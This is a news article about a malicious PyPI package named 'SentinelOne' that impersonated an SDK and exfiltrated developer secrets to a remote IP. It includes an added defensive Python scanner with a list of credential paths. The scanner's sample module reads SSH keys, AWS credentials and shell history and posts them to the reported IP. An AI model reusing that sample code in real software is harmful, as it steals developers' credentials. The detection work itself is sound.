Investigators have discovered that criminals are impersonating a well-known cybersecurity company in an attempt to steal data from software developers.
Researchers at ReversingLabs recently discovered a malicious Python package on PyPI called “SentinelOne”. Named after a well-known United States cybersecurity firm, the package masquerades as a legitimate SDK client that gives easy access to the SentinelOne API from a separate project.
However, the package also ships “api.py” files carrying the malicious code, which exfiltrate sensitive data from developers’ machines to a third-party IP address (54.254.189.27).
Hunting for authentication tokens and API keys
The stolen data includes Bash and Zsh history, SSH keys, .gitconfig files, hosts files, AWS configuration information, Kube configuration information, and others. According to the publication, these directories usually store auth tokens, secrets, and API keys, which would allow threat actors further access to targeted cloud services and server endpoints.
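As an added illustration (not code from ReversingLabs or from the package described), the following Python scanner flags a module that references the sensitive paths listed above together with a hard-coded IPv4 address, the combination that characterised this package. The api.py sample it runs on is constructed here to mimic that pattern; the IP is the one reported in the article.

```python
import ast
import re
from pathlib import Path

# Files and directories the article names as exfiltration targets
# (constructed list for this example, not exhaustive).
SENSITIVE_PATHS = (".bash_history", ".zsh_history", ".ssh", ".gitconfig",
                   "/etc/hosts", ".aws", ".kube")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def string_literals(source: str):
    """Yield every string constant in the module. Walking the AST rather than
    grepping the text means comments cannot cause false positives (docstrings
    are still string constants and do count)."""
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            yield node.value


def scan_source(source: str) -> dict:
    """Return the sensitive paths and IPv4 literals one module references."""
    paths, ips = set(), set()
    for lit in string_literals(source):
        paths.update(p for p in SENSITIVE_PATHS if p in lit)
        ips.update(IPV4_RE.findall(lit))  # version-like strings can match too
    return {"paths": sorted(paths), "ips": sorted(ips)}


def scan_package(root: Path) -> dict:
    """Scan every .py file under root and report modules that both touch
    sensitive paths and name a remote IP, the pattern described above."""
    findings = {}
    for py in sorted(root.rglob("*.py")):
        hit = scan_source(py.read_text(errors="replace"))
        if hit["paths"] and hit["ips"]:
            findings[str(py.relative_to(root))] = hit
    return findings


# Constructed stand-in for the kind of api.py the article describes.
SAMPLE_API_PY = '''
import os, requests
def upload():
    targets = [os.path.expanduser(p) for p in
               ("~/.ssh/id_rsa", "~/.aws/credentials", "~/.bash_history")]
    data = {p: open(p, "rb").read() for p in targets if os.path.exists(p)}
    requests.post("http://54.254.189.27/upload", files=data)
'''


def demo() -> dict:
    """Run the scanner on the constructed sample module."""
    return scan_source(SAMPLE_API_PY)


if __name__ == "__main__":
    print(demo())
```

Point `scan_package` at a freshly installed package directory under site-packages to check every module at once.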
The worst part is that the package does provide the functionality developers expect: in reality it is a hijacked package, so unsuspecting developers can use it and fall victim without noticing. The good news is that ReversingLabs confirmed the package’s malicious intent and, after reporting it to both SentinelOne and PyPI, had it removed from the repository.
In the days and weeks leading up to the takedown, the malicious actors were quite active. The package was first uploaded to PyPI on December 11 and was updated 20 times in less than 10 days.
One of the issues fixed with an update was the inability to exfiltrate data from Linux systems, the researchers found.
It’s hard to tell if anyone fell for the scam, the researchers concluded, since there’s no evidence the package was used in an actual attack. Yet all published versions were downloaded more than 1,000 times.
Via: BleepingComputer